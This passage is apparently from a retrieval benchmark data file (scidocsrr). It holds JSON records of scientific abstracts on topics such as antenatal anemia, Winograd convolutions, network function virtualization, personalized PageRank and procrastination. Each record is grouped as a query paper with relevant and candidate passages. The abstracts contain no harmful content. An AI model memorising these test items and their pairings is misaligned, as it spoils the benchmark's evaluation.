"text": "Background: Antenatal mothers with anemia are high risk to varieties of health implications as well as to their off springs. Many studies show a high mortality and morbidity related to anemia in pregnancy. Methods: This cross-sectional study was designed to determine factors associated with anemia amongst forty seven antenatal mothers attending Antenatal Clinic at Klinik Kesihatan Kuala Besut, Terengganu in November 2009. Systematic random sampling was applied and information gathered based on patients’ medical records and through face-to-face interviewed by using a structured questionnaire. Results: The mean age of respondents was 28.3 year-old. More than half of mothers were multigravidas. Of 47 respondents, 57.4% (95% CI: 43.0, 72.0) was anemic. The proportion of anemia was high for grand multigravidas mother (66.7%), those at third trimester of pregnancy (70.4%), did antenatal booking at first trimester (65.4%), poor haematinic compliance (76.5%), not taking any medication (60.5%), those with no co-morbid illnesses (60.0%), mothers with high education level (71.4%) and those with satisfactory monthly income (61.5%). The proportion of anemia was 58.3% and 57.1% for mothers with last child birth spacing of two years or less and more than two years accordingly. There was a significant association of haematinic compliance with the anemia (OR: 4.571; 95% CI: 1.068, 19.573). Conclusions: Antenatal mothers in this area have a substantial proportion of anemia despite of freely and routinely prescription of haematinic at primary health care centers. Poor haematinic compliance was a significant risk factor. Health education programs regarding haematinic compliance and adequate intake of iron rich diet during pregnancy need to be strengthened to curb this problem. *Corresponding author: NH Nik Rosmawati, Environmental Health Unit, Department of Community Medicine, School of Medical Science, Health Campus, Universiti Sains Malaysia, 16150 Kubang Kerian, Kelantan, Malaysia, E-mail: rosmawati@kk.usm.my Received May 03, 2012; Accepted May 24, 2012; Published May 26, 2012 Citation: Nik Rosmawati NH, Mohd Nazri S, Mohd Ismail I (2012) The Rate and Risk Factors for Anemia among Pregnant Mothers in Jerteh Terengganu, Malaysia. J Community Med Health Educ 2:150. doi:10.4172/2161-0711.1000150 Copyright: © 2012 Nik Rosmawati NH, et al. This is an open-access article distributed under the terms of the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original author and source are credited.",
"title": ""
},
{
"docid": "1258939378850f7d89f6fa860be27c39",
"text": "Sparse methods and the use of Winograd convolutions are two orthogonal approaches, each of which significantly accelerates convolution computations in modern CNNs. Sparse Winograd merges these two and thus has the potential to offer a combined performance benefit. Nevertheless, training convolution layers so that the resulting Winograd kernels are sparse has not hitherto been very successful. By introducing a Winograd layer in place of a standard convolution layer, we can learn and prune Winograd coefficients “natively” and obtain sparsity level beyond 90% with only 0.1% accuracy loss with AlexNet on ImageNet dataset. Furthermore, we present a sparse Winograd convolution algorithm and implementation that exploits the sparsity, achieving up to 31.7 effective TFLOP/s in 32-bit precision on a latest Intel Xeon CPU, which corresponds to a 5.4× speedup over a state-of-the-art dense convolution implementation.",
"title": ""
},
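The abstract above concerns convolutions computed in the Winograd domain. As a worked example of the underlying transform, the sketch below shows the standard 1-D F(2,3) minimal-filtering algorithm and checks it against direct convolution; it does not reproduce the paper's sparse training or pruning, and the matrix names follow common convention rather than the paper.

```python
# Illustrative sketch only: 1-D Winograd F(2,3) computes two outputs of a
# 3-tap filter with 4 element-wise multiplies instead of 6.
import numpy as np

# Standard F(2,3) transform matrices (Lavin & Gray style).
BT = np.array([[1, 0, -1, 0],
               [0, 1,  1, 0],
               [0, -1, 1, 0],
               [0, 1,  0, -1]], dtype=float)
G = np.array([[1,    0,   0],
              [0.5,  0.5, 0.5],
              [0.5, -0.5, 0.5],
              [0,    0,   1]], dtype=float)
AT = np.array([[1, 1,  1,  0],
               [0, 1, -1, -1]], dtype=float)

def winograd_f23(d, g):
    # Y = A^T [ (G g) * (B^T d) ]  -- '*' is element-wise (the 4 multiplies).
    return AT @ ((G @ g) * (BT @ d))

def direct(d, g):
    # Direct sliding-window correlation producing the same two outputs.
    return np.array([d[0]*g[0] + d[1]*g[1] + d[2]*g[2],
                     d[1]*g[0] + d[2]*g[1] + d[3]*g[2]])

d = np.array([1.0, 2.0, 3.0, 4.0])   # 4 input samples
g = np.array([0.5, -1.0, 2.0])       # 3-tap filter
print(winograd_f23(d, g), direct(d, g))   # identical results
```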
{
"docid": "42e07265a724f946fe7c76b7d858279d",
"text": "This work investigates design optimisation and design trade-offs for multi-kW DC-DC Interleaved Boost Converters (IBC). A general optimisation procedure for weight minimisation is presented, and the trade-offs between the key design variables (e.g. switching frequency, topology) and performance metrics (e.g. power density, efficiency) are explored. It is shown that the optimal selection of components, switching frequency, and topology are heavily dependent on operating specifications such as voltage ratio, output voltage, and output power. With the device and component technologies considered, the single-phase boost converter is shown to be superior to the interleaved topologies in terms of power density for lower power, lower voltage specifications, whilst for higher-power specifications, interleaved designs are preferable. Comparison between an optimised design and an existing prototype for a 220 V–600 V, 40 kW specification, further illustrates the potential weight reduction that is afforded through design optimisation, with the optimised design predicting a reduction in component weight of around 33%.",
"title": ""
}
] | scidocsrr |
b945d47777ceb1095a9d073dcce35810 | Fast and Accurate Prediction of Sentence Specificity | [
{
"docid": "3b0b6075cf6cdb13d592b54b85cdf4af",
"text": "We address the problem of sentence alignment for monolingual corpora, a phenomenon distinct from alignment in parallel corpora. Aligning large comparable corpora automatically would provide a valuable resource for learning of text-totext rewriting rules. We incorporate context into the search for an optimal alignment in two complementary ways: learning rules for matching paragraphs using topic structure and further refining the matching through local alignment to find good sentence pairs. Evaluation shows that our alignment method outperforms state-of-the-art systems developed for the same task.",
"title": ""
}
] | [
{
"docid": "b83351de72da4c2fdeec1da10eb4a5eb",
"text": "How to determine the impact of soft variables, including intangibles or social variables, and combining them as necessary with hard variables in system dynamics models is a significant challenge. This paper identifies a weakness in system dynamics modelling practice, that is, in reliably incorporating soft variables into system dynamics models. A method for incorporating such variables and a basis for further research is offered. The method combines systems thinking, research into causality analysis, multiple criteria decision analysis (conjoint analysis) and system dynamics modelling, in an integrated approach. “To omit such [soft] variables is equivalent to saying that they have zero effect – probably the only value that is known to be wrong!” (Forrester, 1961: 57) It is inescapable that from time-to-time we will need to build system dynamics models that take soft i variables into account. The challenge is to incorporate the influences of soft variables in ways that produce meaningful, reliable and repeatable results. We need to develop in-depth understanding of the roles and influences of soft variables. We must avoid making guesses about the influences that soft variables might have. Rather, we must create and repeatedly test dynamic hypotheses about soft variables. This will also demand that we comprehensively document our hypotheses about influences and how those influences are produced and combined, making the results available for peer review. Only when we do this will we build a sound appreciation of the nature and significance of soft variables both in our models and in the real world. Our track record in this area is not as good as it might be, as the following example suggests. Pseudo-algebraic Expressions in System Dynamics Models – An Example It is disturbing to encounter system dynamics models reflecting guesses about soft variables and as a result containing pseudo-algebraic expressions conveniently and artificially contrived to make a model or simulation behave as the modeller intends. Evidence of this practice can be found in models produced by students and experienced practitioners alike. Pseudoalgebraic expressions are a corruption of mathematical logic used to conveniently and artificially combine quantified soft variables. Such expressions may also involve mixes of hard and quantified soft variables. The assumptions underlying this practice seem to be that soft variables, including that class of soft variables known as ‘intangibles’: • conform to numerical scales; • can be quantified in an absolute sense; • quantification is both valid and universally acceptable; and • once quantified, soft variables can be treated as dimensionless variables that can be added or multiplied ii in exactly the same way as ordinary variables encountered routinely in system dynamics modelling are. In their totality, these assumptions are erroneous; when taken individually, caution is needed. Further, any practice leading to the creation of pseudo-algebraic expressions, or their use, must be closely scrutinised. In one particular example seen recently, a management flight simulator was built to assist in training managers to make decisions in the complex dynamic environment a particular firm operates. The underlying model contained around 60 variables, of which some 20 could only be described as being soft. 
Algebraic expressions made up of interesting mixes of hard and soft variables were built into the model to replicate the modes of behaviour that the modeller had identified as important. One expression in the model contained the soft variables Organisational_Performance, Qualifications_Held_By_Individuals, and Individual’s_Motivation_Level. Organisational_Performance was intended to describe how well the organisation performed (in an average sense, rather than in relation to discrete events) in making decisions, where decision makers were required to draw upon their own knowledge, skill and competence. Qualifications_Held_By_Individuals described how well equipped individuals, in terms of formal qualifications held (including skills and competencies), were to make decisions and Individual’s_Motivation_Level indicated motivation of individuals to take action, make the necessary decisions, or to implement a particular strategy. The resulting algebraic expression took the form: Organisational_Performance = Qualifications_Held_By_Individuals x Individual’s_Motivation_Level. The abuse of mathematical logic and system dynamics principles in this example should be self-evident. Despite obvious flaws in the model, the paper describing this model was peer reviewed and ultimately accepted for a recent international system dynamics conference. This suggests that, as a group, we are prepared to accept these dubious modelling practices. The intent of the modeller in producing this simulator was genuine although surprisingly naïve. The modeller apparently set out to do exactly what we teach, that is, to replicate observed reference modes of behaviour. Our actions, both in terms of learning and system dynamics modelling practice, are misguided and naïve if we do not critically investigate why and how reference modes of behaviour are produced. In this instance, it seems that the modeller was actually mimicking what he saw as an important reference mode of behaviour without having a clear understanding of how that particular reference mode was actually created in the real world, or, if he did, he did not have the necessary tools (either physical or intellectual) to build a faithful representation of the causal mechanisms. In this instance, and probably of greater concern, how the particular reference mode of behaviour was actually created is unlikely ever to be questioned by anybody subsequently flying the management flight simulator in a training session. This is because the underlying structure of the model and its code, which make the simulator behave as it does, are masked from the players. Players, like the layperson in many real-life systemic problem situations, will focus on the responses to their actions rather than the (obscured) mechanisms producing the responses. The absence of essential critical analysis in such instances is very likely to lead to the unfortunate consequences that: • poor practices become embedded in the design of simulations; • erroneous conclusions are drawn about systemic causality, where soft variables are involved; and • fallacious learning experiences occur. This suggests we must look seriously at the treatment of soft variables in system dynamics modelling. Need to Take a Hard Look at Soft Variables in System Dynamics Models Sterman (2002: 522-523) makes the following points regarding soft variables in system dynamics models: • Soft variables should be included in our models if they are important to the purpose.
• Omitting structures or variables known to be important because numerical data are unavailable is actually less scientific and less accurate than using your best judgement to estimate their values. Omitting concepts because they have no numerical data is a sure route to narrow model boundaries, biased results and policy resistance. • We must evaluate the sensitivity of our results to uncertainty in assumptions – whether we estimated the parameters judgmentally or by statistical means. • It is important to use proper statistical methods to estimate parameters and assess the ability of the model to replicate historical data when numerical data are available. Rigorously defined constructs, attempting to measure them, and using the most appropriate methods to estimate their magnitudes are important antidotes to causal empiricism, muddled formulations and erroneous conclusions we often draw from our mental models. • Most importantly, we should not accept the availability of data as given, as outside the boundaries of our project or research. We must ask why concepts our modelling suggests are important have not been measured. Frequently it is because no one thought these concepts were important...[stemming] from the narrow boundaries of our understanding. • Human creativity is great: once we recognise the importance of a concept, we can almost always find ways to measure it. Today, many apparently soft variables such as customer perceptions of quality, employee morale, investor optimism, and political values are routinely quantified with tools such as content analysis, surveys, and conjoint analysis. • Of course all measurements are imperfect. Metrics for so-called soft variables continue to be refined, just as metrics for so-called hard variables are. Quantification often yields important insights into the structure and dynamics of a problem. Often, the greatest benefit of a modelling project is to help the client see the importance of and begin to measure and account for soft variables and concepts previously ignored. Simply put, we need to take soft variables into account when they are likely to have an impact; priority for incorporating such variables, as in the case of hard variables, must be based on the likely extent of their impact. If these variables are likely to have an impact and are, therefore, worthy of inclusion in our models, we should measure them if we can. If we cannot measure them, we should estimate them as best we can by methods that give consistent, repeatable and reliable results. We cannot afford to take shortcuts and indulge in poor modelling practices regardless of how tempting and convenient it might appear to be at the time; to do so could seriously damage confidence in the system dynamics modelling discipline or, even worse, destroy our credibility. Purpose of This Paper How to determine the impact of soft variables, including intangibles or social variables, and combine them through the system dynamics modelling process with hard variables is particularly vexing. This paper offers a method of incorporating soft variables.",
"title": ""
},
{
"docid": "a4969e82e3cccf5c9ca7177d4ca5007c",
"text": "Traditional views of automaticity are in need of revision. For example, automaticity often has been treated as an all-or-none phenomenon, and traditional theories have held that automatic processes are independent of attention. Yet recent empirical data suggest that automatic processes are continuous, and furthermore are subject to attentional control. A model of attention is presented to address these issues. Within a parallel distributed processing framework, it is proposed that the attributes of automaticity depend on the strength of a processing pathway and that strength increases with training. With the Stroop effect as an example, automatic processes are shown to be continuous and to emerge gradually with practice. Specifically, a computational model of the Stroop task simulates the time course of processing as well as the effects of learning. This was accomplished by combining the cascade mechanism described by McClelland (1979) with the backpropagation learning algorithm (Rumelhart, Hinton, & Williams, 1986). The model can simulate performance in the standard Stroop task, as well as aspects of performance in variants of this task that manipulate stimulus-onset asynchrony, response set, and degree of practice. The model presented is contrasted against other models, and its relation to many of the central issues in the literature on attention, automaticity, and interference is discussed.",
"title": ""
},
{
"docid": "ed5d83c524e9e2a30a537115184b9d13",
"text": "Abstract Stan is a free and open-source C++ program that performs Bayesian inference or optimization for arbitrary user-specified models and can be called from the command line, R, Python, Matlab, or Julia, and has great promise for fitting large and complex statistical models in many areas of application. We discuss Stan from users’ and developers’ perspective and illustrate with a simple but nontrivial nonlinear regression example.",
"title": ""
},
{
"docid": "5f4330e3ddd6339cf340a72c73d2106b",
"text": "As a new trend for data-intensive computing, real-time stream computing is gaining significant attention in the big data era. In theory, stream computing is an effective way to support big data by providing extremely low-latency processing tools and massively parallel processing architectures in real-time data analysis. However, in most existing stream computing environments, how to efficiently deal with big data stream computing, and how to build efficient big data stream computing systems are posing great challenges to big data computing research. First, the data stream graphs and the system architecture for big data stream computing, and some related key technologies, such as system structure, data transmission, application interfaces, and high availability, are systemically researched. Then, we give a classification of the latest research and depict the development status of some popular big data stream computing systems, including Twitter Storm, Yahoo! S4, Microsoft TimeStream, and Microsoft Naiad. Finally, the potential challenges and future directions of big data stream computing are discussed. 11.",
"title": ""
},
{
"docid": "a7d02aee0ef3730504adefc2d8c05c49",
"text": "We tackle the challenge of reliably and automatically localizing pedestrians in real-life conditions through overhead depth imaging at unprecedented high-density conditions. Leveraging upon a combination of Histogram of Oriented Gradients-like feature descriptors, neural networks, data augmentation and custom data annotation strategies, this work contributes a robust and scalable machine learning-based localization algorithm, which delivers near-human localization performance in real-time, even with local pedestrian density of about 3 ped/m2, a case in which most stateof-the art algorithms degrade significantly in performance.",
"title": ""
},
{
"docid": "b754b1d245aa68aeeb37cf78cf54682f",
"text": "This paper postulates that water structure is altered by biomolecules as well as by disease-enabling entities such as certain solvated ions, and in turn water dynamics and structure affect the function of biomolecular interactions. Although the structural and dynamical alterations are subtle, they perturb a well-balanced system sufficiently to facilitate disease. We propose that the disruption of water dynamics between and within cells underlies many disease conditions. We survey recent advances in magnetobiology, nanobiology, and colloid and interface science that point compellingly to the crucial role played by the unique physical properties of quantum coherent nanomolecular clusters of magnetized water in enabling life at the cellular level by solving the “problems” of thermal diffusion, intracellular crowding, and molecular self-assembly. Interphase water and cellular surface tension, normally maintained by biological sulfates at membrane surfaces, are compromised by exogenous interfacial water stressors such as cationic aluminum, with consequences that include greater local water hydrophobicity, increased water tension, and interphase stretching. The ultimate result is greater “stiffness” in the extracellular matrix and either the “soft” cancerous state or the “soft” neurodegenerative state within cells. Our hypothesis provides a basis for understanding why so many idiopathic diseases of today are highly stereotyped and pluricausal. OPEN ACCESS Entropy 2013, 15 3823",
"title": ""
},
{
"docid": "17db752bfc7ce75ded5b3836c5ae3dd7",
"text": "Knowledge-based question answering relies on the availability of facts, the majority of which cannot be found in structured sources (e.g. Wikipedia info-boxes, Wikidata). One of the major components of extracting facts from unstructured text is Relation Extraction (RE). In this paper we propose a novel method for creating distant (weak) supervision labels for training a large-scale RE system. We also provide new evidence about the effectiveness of neural network approaches by decoupling the model architecture from the feature design of a state-of-the-art neural network system. Surprisingly, a much simpler classifier trained on similar features performs on par with the highly complex neural network system (at 75x reduction to the training time), suggesting that the features are a bigger contributor to the final performance.",
"title": ""
},
{
"docid": "f4e8b75ce3149566edec9eb1f248c226",
"text": "Knowledge Management software is software that integrates. Existing Data sources, process flows, application features from office appliances have to be brought together. There are different standards, consisting of data formats and communication protocols, that address this issue. The WWW and Semantic Web are designed to work on a worldwide scale and define those standards. We transfer the web standards to the desktop szenario, a vision we call Semantic Desktop – a Semantic Web enhanced desktop environment. Central is the idea of taking know-how from the Semantic Web to tackle personal information management. Existing desktop applications (email client, browser, office applications) are integrated, the semantic glue between them expressed using ontologies. We also present the www.gnowsis.org open source project by the DFKI that realizes parts of this vision. It is based on a Semantic Web Server running as desktop service. It was used in experiments and research projects and allows others to experiment. Knowledge management applications can be built on top of it, reducing the implementation cost. 1",
"title": ""
},
{
"docid": "d318fa3ea2d612db3ba3b7dd56e40906",
"text": "Super-resolution microscopy (SRM) is becoming increasingly important to study nanoscale biological structures. Two most widely used devices for SRM are super-resolution fluorescence microscopy (SRFM) and electron microscopy (EM). For biological living samples, however, SRFM is not preferred since it requires exogenous agents and EM is not preferred since vacuum is required for sample preparation. To overcome these limitations of EM and SFRM, we present a simulation study of super-resolution photoacoustic microscopy (SR-PAM). To break the diffraction limit of light, we investigated a sub-10 nm near-field localization by focusing femtosecond laser pulses under the plasmonic nanoaperture. Using this near-field localization as a light source, we numerically studied the feasibility of the SR-PAM with a k-wave simulation toolbox in MATLAB. In this photoacoustic simulation, we successfully confirmed that the SR-PAM could be a potential method to resolve and image nanoscale structures.",
"title": ""
},
{
"docid": "54b60f333ba4e58f2f1f2614e54b50a8",
"text": "Personalize PageRank (PPR) is an effective relevance (proximity) measure in graph mining. The goal of this paper is to efficiently compute single node relevance and top-k/highly relevant nodes without iteratively computing the relevances of all nodes. Based on a \"random surfer model\", PPR iteratively computes the relevances of all nodes in a graph until convergence for a given user preference distribution. The problem with this iterative approach is that it cannot compute the relevance of just one or a few nodes. The heart of our solution is to compute single node relevance accurately in non-iterative manner based on sparse matrix representation, and to compute top-k/highly relevant nodes exactly by pruning unnecessary relevance computations based on upper/lower relevance estimations. Our experiments show that our approach is up to seven orders of magnitude faster than the existing alternatives.",
"title": ""
},
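The abstract above targets personalized PageRank (PPR). For reference, the sketch below computes PPR by plain power iteration with restarts, which is the full-graph computation the paper aims to avoid for single-node and top-k queries; the function and parameter names are illustrative assumptions.

```python
# Illustrative sketch only: personalized PageRank by power iteration on a
# sparse, column-normalized adjacency matrix.
import numpy as np
import scipy.sparse as sp

def personalized_pagerank(A, preference, c=0.15, tol=1e-10, max_iter=1000):
    # A: sparse adjacency matrix with A[i, j] = 1 for an edge j -> i.
    # Column-normalize so each column sums to 1 (out-degree normalization).
    out_deg = np.asarray(A.sum(axis=0)).ravel()
    P = A @ sp.diags(1.0 / np.maximum(out_deg, 1))
    r = preference.copy()
    for _ in range(max_iter):
        r_new = (1 - c) * (P @ r) + c * preference   # random surfer with restart
        if np.abs(r_new - r).sum() < tol:
            return r_new
        r = r_new
    return r

# Toy usage: a 4-node ring, preference concentrated on node 0.
edges = [(0, 1), (1, 2), (2, 3), (3, 0)]
A = sp.lil_matrix((4, 4))
for src, dst in edges:
    A[dst, src] = 1.0
pref = np.array([1.0, 0.0, 0.0, 0.0])
print(personalized_pagerank(A.tocsr(), pref))
```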
{
"docid": "ecb06a681f7d14fc690376b4c5a630af",
"text": "Diverse proprietary network appliances increase both the capital and operational expense of service providers, meanwhile causing problems of network ossification. Network function virtualization (NFV) is proposed to address these issues by implementing network functions as pure software on commodity and general hardware. NFV allows flexible provisioning, deployment, and centralized management of virtual network functions. Integrated with SDN, the software-defined NFV architecture further offers agile traffic steering and joint optimization of network functions and resources. This architecture benefits a wide range of applications (e.g., service chaining) and is becoming the dominant form of NFV. In this survey, we present a thorough investigation of the development of NFV under the software-defined NFV architecture, with an emphasis on service chaining as its application. We first introduce the software-defined NFV architecture as the state of the art of NFV and present relationships between NFV and SDN. Then, we provide a historic view of the involvement from middlebox to NFV. Finally, we introduce significant challenges and relevant solutions of NFV, and discuss its future research directions by different application domains.",
"title": ""
},
{
"docid": "711ca6f01ed407e1026dd9958ae94cb2",
"text": "The Internet of Things (IoT) is increasingly used for critical applications and securing the IoT has become a major concern. Among other issues it is important to ensure that tampering with IoT devices is detected. Many IoT devices use WiFi for communication and Channel State Information (CSI) based tamper detection is a valid option. Each 802.11n WiFi frame contains a preamble which allows a receiver to estimate the impact of the wireless channel, the transmitter and the receiver on the signal. The estimation result - the CSI - is used by a receiver to extract the transmitted information. However, as the CSI depends on the communication environment and the transmitter hardware, it can be used as well for security purposes. If an attacker tampers with a transmitter it will have an effect on the CSI measured at a receiver. Unfortunately not only tamper events lead to CSI fluctuations; movement of people in the communication environment has an impact too. We propose to analyse CSI values of a transmission simultaneously at multiple receivers to improve distinction of tamper and movement events. A moving person is expected to have an impact on some but not all communication links between transmitter and the receivers. A tamper event impacts on all links between transmitter and the receivers. The paper describes the necessary algorithms for the proposed tamper detection method. In particular we analyse the tamper detection capability in practical deployments with varying intensity of people movement. In our experiments the proposed system deployed in a busy office environment was capable to detect 53% of tamper events (TPR = 53%) while creating zero false alarms (FPR = 0%).",
"title": ""
},
{
"docid": "757cf49ed451205b6f710953e835dfc6",
"text": "We consider the problem of event-related desynchronization (ERD) estimation. In existing approaches, model parameters are usually found manually through experimentation, a tedious task that often leads to suboptimal estimates. We propose an expectation-maximization (EM) algorithm for model parameter estimation that is fully automatic and gives optimal estimates. Further, we apply a Kalman smoother to obtain ERD estimates. Results show that the EM algorithm significantly improves the performance of the Kalman smoother. Application of the proposed approach to the motor-imagery EEG data shows that useful ERD patterns can be obtained even without careful selection of frequency bands.",
"title": ""
},
{
"docid": "e3913c904630d23b7133978a1116bc57",
"text": "A novel self-substrate-triggered (SST) technique is proposed to solve the nonuniform turn-on issue of the multi-finger GGNMOS for ESD protection. The first turned-on center finger is used to trigger on all fingers in the GGNMOS structure with self-substrate-triggered technique. So, the turn-on uniformity and ESD robustness of GGNMOS can be greatly improved by the new proposed self-substrate-triggered technique.",
"title": ""
},
{
"docid": "2dcfb5cbc80c05698ad717b1043b1484",
"text": "A new control method using a hysteretic PWM controller for all types of converters and its proper design method are presented. The triangular voltage obtained from a simple RC network connected between comparator output and converter output is superimposed to the output voltage and as a feedback signal to a hysteretic comparator. Since the hysteretic PWM controller essentially has derivative characteristics and has no error amplifier, the presented method provides no steady-state error voltage on the output and excellent dynamic performances for the load current transient by choosing proper values of time constants in the RC network. Performances of the proposed controller are experimentally verified for the buck, buck-boost and boost converters.",
"title": ""
},
{
"docid": "71b5708fb9d078b370689cac22a66013",
"text": "This paper presents a model, synthesized from the literature, of factors that explain how business analytics contributes to business value. It also reports results from a preliminary test of that model. The model consists of two parts: a process and a variance model. The process model depicts the analyze-insight-decision-action process through which use of an organization’s business-analytic capabilities create business value. The variance model proposes that the five factors in Davenport et al.’s (2010) DELTA model of BA success factors, six from Watson and Wixom (2007), and three from Seddon et al.’s (2010) model of organizational benefits from enterprise systems, assist a firm to gain business value from business analytics. A preliminary test of the model was conducted using data from 100 customer-success stories from vendors such as IBM, SAP, and Teradata. Our conclusion is that the model is likely to be a useful basis for future research.",
"title": ""
},
{
"docid": "d9a23e088330f7564c14093b4ceabbec",
"text": "One of the most contested questions in the social sciences is whether people behave rationally. A large body of work assumes that individuals do in fact make rational economic, political, and social decisions. Yet hundreds of experiments suggest that this is not the case. Framing effects constitute one of the most stunning and influential demonstrations of irrationality. The effects not only challenge the foundational assumptions of much of the social sciences (e.g., the existence of coherent preferences or stable attitudes), but also lead many scholars to adopt alternative approaches (e.g., prospect theory). Surprisingly, virtually no work has sought to specify the political conditions under which framing effects occur. I fill this gap by offering a theory and experimental test. I show how contextual forces (e.g., elite competition, deliberation) and individual attributes (e.g., expertise) affect the success of framing. The results provide insight into when rationality assumptions apply and, also, have broad implications for political psychology and experimental methods.",
"title": ""
},
{
"docid": "659ba70d9d0d17e5d1b708cb5c61be2c",
"text": "It has been hypothesized that there is a critical period for first-language acquisition that extends into late childhood and possibly until puberty. The hypothesis is difficult to test directly because cases of linguistic deprivation during childhood are fortunately rare. We present here the case of E.M., a young man who has been profoundly deaf since birth and grew up in a rural area where he received no formal education and had no contact with the deaf community. At the age of 15, E.M. was fitted with hearing aids that corrected his hearing loss to 35 dB, and he began to learn verbal Spanish. We describe his language development over the 4-year period since his acquisition of hearing aids and conclude that the demonstrates severe deficits in verbal comprehension and production that support the critical period hypothesis.",
"title": ""
},
{
"docid": "7f0a2510e2f9d23fe5058bf5fa826b59",
"text": "This paper presents the progress of acoustic models for lowresourced languages (Assamese, Bengali, Haitian Creole, Lao, Zulu) developed within the second evaluation campaign of the IARPA Babel project. This year, the main focus of the project is put on training high-performing automatic speech recognition (ASR) and keyword search (KWS) systems from language resources limited to about 10 hours of transcribed speech data. Optimizing the structure of Multilayer Perceptron (MLP) based feature extraction and switching from the sigmoid activation function to rectified linear units results in about 5% relative improvement over baseline MLP features. Further improvements are obtained when the MLPs are trained on multiple feature streams and by exploiting label preserving data augmentation techniques like vocal tract length perturbation. Systematic application of these methods allows to improve the unilingual systems by 4-6% absolute in WER and 0.064-0.105 absolute in MTWV. Transfer and adaptation of multilingually trained MLPs lead to additional gains, clearly exceeding the project goal of 0.3 MTWV even when only the limited language pack of the target language is used.",
"title": ""
},
{
"docid": "d59a63413ad3ca838178fc399fd6b0f3",
"text": "In this study a mission data base based clustering approach that can be used in radar warning receivers for the purpose of deinterleaving is suggested. Cell based deinterleaving technique, which is widely used at the present time, utilizes the information of direction of arrival, frequency and pulse width. In this study, different from this approach used in the literature, frequency, direction of arrival and pulse amplitude parameters are utilized for deinterleaving. With this technique it is shown that accurate results can be obtained by simulation.",
"title": ""
}
] | scidocsrr |
ad65c4c7f9538ac58cf2af74a7d70183 | ARCHER: Aggressive Rewards to Counter bias in Hindsight Experience Replay | [
{
"docid": "b8b3c053c95fbc3cb211ff4c9a4ced03",
"text": "We propose Scheduled Auxiliary Control (SACX), a new learning paradigm in the context of Reinforcement Learning (RL). SAC-X enables learning of complex behaviors – from scratch – in the presence of multiple sparse reward signals. To this end, the agent is equipped with a set of general auxiliary tasks, that it attempts to learn simultaneously via off-policy RL. The key idea behind our method is that active (learned) scheduling and execution of auxiliary policies allows the agent to efficiently explore its environment – enabling it to excel at sparse reward RL. Our experiments in several challenging robotic manipulation settings demonstrate the power of our approach. A video of the rich set of learned behaviours can be found at https://youtu.be/mPKyvocNe M.",
"title": ""
},
{
"docid": "73977bfb83e82862445f0c114a0ba722",
"text": "Current machine learning systems operate, almost exclusively, in a statistical, or model-blind mode, which entails severe theoretical limits on their power and performance. Such systems cannot reason about interventions and retrospection and, therefore, cannot serve as the basis for strong AI. To achieve human level intelligence, learning machines need the guidance of a model of reality, similar to the ones used in causal inference. To demonstrate the essential role of such models, I will present a summary of seven tasks which are beyond reach of current machine learning systems and which have been accomplished using the tools of causal inference.",
"title": ""
}
] | [
{
"docid": "f6211f28785ac28d8ff91459fe81a6f7",
"text": "We describe a novel approach to the measurement of discounting based on calculating the area under the empirical discounting function. This approach avoids some of the problems associated with measures based on estimates of the parameters of theoretical discounting functions. The area measure may be easily calculated for both individual and group data collected using any of a variety of current delay and probability discounting procedures. The present approach is not intended as a substitute for theoretical discounting models. It is useful, however, to have a simple, univariate measure of discounting that is not tied to any specific theoretical framework.",
"title": ""
},
{
"docid": "57897a9c927743037dab98a1538a1563",
"text": "Affective lexicons are a useful tool for emotion studies as well as for opinion mining and sentiment analysis. Such lexicons contain lists of words annotated with their emotional assessments. There exist a number of affective lexicons for English, Spanish, German and other languages. However, only a few of such resources are available for French. A lot of human efforts are needed to build and extend an affective lexicon. In our research, we propose to use Twitter, the most popular microblogging platform nowadays, to collect a dataset of emotional texts in French. Using the collected dataset, we estimated affective norms of words to construct an affective lexicon, which we use for polarity classification of video game reviews. Experimental results show that our method performs comparably to classic supervised learning methods.",
"title": ""
},
{
"docid": "51bd82a4393105ed63a188b2dd54956b",
"text": "Although perceived continuity with one's future self has attracted increasing research interest, age differences in this phenomenon remain poorly understood. The present study is the first to simultaneously examine past and future self-continuity across multiple temporal distances using both explicit and implicit measures and controlling for a range of theoretically implicated covariates in an adult life span sample (N = 91, aged 18-92, M = 50.15, SD = 19.20, 56% female). Perceived similarity to one's self across 6 past and 6 future time points (1 month to 10 years) was assessed with an explicit self-report measure and an implicit me/not me trait rating task. In multilevel analyses, age was significantly associated with greater implicit and explicit self-continuity, especially for more distant intervals. Further, reaction times (RTs) in the implicit task remained stable with temporal distance for older adults but decreased with temporal distance for younger adults, especially for future ratings. This points toward age differences in the underlying mechanisms of self-continuity. Multilevel models examined the role of various covariates including personality, cognition, future horizons, and subjective health and found that none of them could fully account for the observed age effects. Taken together, our findings suggest that chronological age is associated with greater self-continuity although specific mechanisms and correlates may vary by age. (PsycINFO Database Record",
"title": ""
},
{
"docid": "700ee7aa274175cbfdd26ad12f210cdc",
"text": "Differing characteristics of local environments, both infrastructural and socio-economic, have created a significant level of variation in the acceptance and growth of e-commerce in different regions of the world. Our findings show that, in development and diffusion of ecommerce in China, cultural issues such as “socializing effect of commerce”, “transactional and institutional trust”, and “attitudes toward debt” play a very major role. In this paper, we present and discuss these findings, and identify changes that will be required for broader acceptance and diffusion of e-commerce in China and propose approaches that businesses can use to enhance this development.",
"title": ""
},
{
"docid": "989c0cba84b496a9a6801f34a7f7636d",
"text": "The profusion of user generated content caused by the rise of social media platforms has enabled a surge in research relating to fields such as information retrieval, recommender systems, data mining and machine learning. However, the lack of comprehensive baseline data sets to allow a thorough evaluative comparison has become an important issue. In this paper we present a large data set of news items from well-known aggregators such as Google News and Yahoo! News, and their respective social feedback on multiple platforms: Facebook, Google+ and LinkedIn. The data collected relates to a period of 8 months, between November 2015 and July 2016, accounting for about 100,000 news items on four different topics: economy, microsoft, obama and palestine. This data set is tailored for evaluative comparisons in predictive analytics tasks, although allowing for tasks in other research areas such as topic detection and tracking, sentiment analysis in short text, first story detection or news recommendation..",
"title": ""
},
{
"docid": "aa74bb5c6dbb758e0a68e10b1f35f3c9",
"text": "College students differ in their approaches to challenging course assignments. While some prefer to begin their assignments early, others postpone their work until the last minute. The present study adds to the procrastination literature by examining the links among self-compassionate attitudes, motivation, and procrastination tendency. A sample of college undergraduates completed four online surveys. Individuals with low, moderate, and high levels of self-compassion were compared on measures of motivation anxiety, achievement goal orientation, and procrastination tendency. Data analyses revealed that individuals with high self-compassion reported dramatically less motivation anxiety and procrastination tendency than those with low or moderate self-compassion. The practical importance of studying self-views as potential triggers for procrastination behavior and directions for future research are discussed.",
"title": ""
},
{
"docid": "246bbb92bc968d20866b8c92a10f8ac7",
